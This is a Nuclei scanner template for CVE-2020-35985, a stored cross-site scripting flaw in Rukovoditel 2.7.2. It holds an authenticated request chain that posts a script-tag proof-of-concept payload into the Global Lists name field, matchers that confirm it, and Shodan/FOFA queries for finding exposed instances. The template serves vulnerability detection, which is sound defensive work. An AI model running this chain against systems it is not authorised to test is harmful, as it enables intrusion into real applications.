nuclei-templates/http/cves/2020/CVE-2020-35985.yaml

69 lines
2.6 KiB
YAML

id: CVE-2020-35985
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.
remediation: |
Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/3
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35985
cwe-id: CWE-79
epss-score: 0.00127
epss-percentile: 0.47399
cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: rukovoditel
product: rukovoditel
shodan-query: http.favicon.hash:-1499940355
fofa-query: icon_hash=-1499940355
tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_lists/lists&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
# digest: 4a0a0047304502202d90c2eb84256f04b073de463cfb0402ec212dd03ace14707634a33145e8c7fc022100bb8e7cccf338be987caa5eb7b8f1e1ccdf1448480d085010259f5a8992f1d10d:922c64590222798bb761d5b6d8e72950